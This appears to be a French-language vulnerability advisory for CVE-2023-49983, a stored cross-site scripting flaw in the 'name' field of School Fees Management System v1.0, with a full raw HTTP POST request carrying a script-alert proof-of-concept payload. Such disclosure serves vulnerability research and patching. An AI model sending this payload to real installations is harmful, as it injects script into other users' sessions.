
Système de gestion des frais scolaires v1.0 - Vulnérabilité Cross-Site Scripting (XSS) dans le champ/paramètre "name" sur "/management/class"
Description : Une vulnérabilité de cross-site scripting (XSS) dans le composant "/management/class" de School Fees Management System v1.0 permet à des attaquants d'exécuter des scripts web ou du HTML arbitraires via une charge utile malveillante injectée dans le paramètre name.
Version du produit vulnérable : School Fees Management System v1.0
Auteur du CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49983
Testé sur : Windows
Pour exploiter la vulnérabilité, un utilisateur disposant des permissions appropriées doit accéder à la page "/ci_fms/admin/management/class". Sur cette page, l'utilisateur doit soit modifier une classe existante, soit en ajouter une nouvelle. La charge utile malveillante doit être insérée dans le paramètre "name" lors de ce processus.
POST /ci_fms/admin/action/edit_student/1/1 HTTP/1.1
Host: 192.168.68.148
Content-Length: 268
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydFBWs52W42v8XLGe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/enrollment/class/1
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=c561k45qbrtsb34f2k30f936v0aijl01
Connection: close
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="name"
<script>alert(document.domain)</script>
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="parent"
1
------WebKitFormBoundarydFBWs52W42v8XLGe--
Découvreur(s)/Crédits :
Geraldo Alcântara